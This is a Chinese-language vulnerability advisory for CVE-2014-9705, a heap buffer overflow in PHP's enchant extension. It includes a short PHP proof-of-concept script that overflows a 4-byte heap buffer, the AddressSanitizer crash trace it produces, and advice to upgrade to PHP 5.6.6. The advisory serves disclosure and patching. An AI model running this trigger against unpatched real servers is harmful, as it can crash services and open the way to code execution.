PHP堆缓冲区溢出漏洞
发布日期:2014-12-05
更新日期:2015-03-16
受影响系统:
PHP PHP <= 5.6.5
描述:
CVE(CAN) ID: CVE-2014-9705
PHP是一种通用开源脚本语言。
PHP 5.6.5及更早版本,enchant_broker_request_dict()函数存在堆缓冲区溢出漏洞,远程攻击者可利用此漏洞覆盖4个字节的堆缓冲区,造成拒绝服务或执行任意代码。
<*来源:PHP
链接:https://www.htbridge.com/advisory/HTB23252
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
$tag = 'en_US';
$r = enchant_broker_init();
$d = enchant_broker_request_dict($r, $tag);
enchant_dict_quick_check($d, 'one', $suggs);
$d = enchant_broker_request_dict($r, $tag);
enchant_dict_quick_check($d, 'one', $suggs);
$d = enchant_broker_request_dict($r, $tag);
?>
Result:
========
[Fri Dec 5 13:32:59 2014] Script: '/home/symeon/Desktop/dict.php'
---------------------------------------
/home/ symeon/Desktop/php-5.6.3/ext/enchant/enchant.c(554) : Block 0xb3256a2c status:
Beginning: OK (allocated on /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:554, 4 bytes)
Start: OK
End: Overflown (magic=0x00000034 instead of 0xAF9A0F68)
At least 4 bytes overflown
---------------------------------------
============================ =====================================
==4350== ERROR: AddressSanitizer: heap-buffer-overflow on address 0xaf9a0f78 at pc 0x84ee4e8 bp 0xbffa7a78 sp 0xbffa7a6c
WRITE of size 4 at 0xaf9a0f78 thread T0
#0 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
#1 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
#2 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
#3 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
#4 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388
#5 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344
#6 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584
#7 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994
#8 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378
#9 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
#10 0x807d080 in _start ??:?
0xaf9a0f78 is located 248 bytes to the right of 0-byte region [0xaf9a0e80,0xaf9a0e80)
==4350== AddressSanitizer CHECK failed: ../../../../src/libsanitizer/asan/asan_allocator2.cc:216 "((id)) != (0)" (0x0, 0x0)
#0 0xb617d4b2 in _ZdaPvRKSt9nothrow_t ??:?
#1 0xb61860cc in _ZN11__sanitizer11CheckFailedEPKciS1_yy ??:?
#2 0xb616ef1e in ?? ??:0
#3 0xb61836d3 in __asan_unpoison_stack_memory ??:?
#4 0xb6184b7f in __asan_report_error ??:?
#5 0xb617db2e in __asan_report_store4 ??:?
#6 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
#7 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
#8 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
#9 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
#10 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388
#11 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344
#12 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584
#13 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994
#14 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378
#15 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
建议:
厂商补丁:
PHP
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载5.6.6版本:
http://php.net/archive/2015.php#id2015-02-19-2
PHP 的详细介绍:请点这里
PHP 的下载地址:请点这里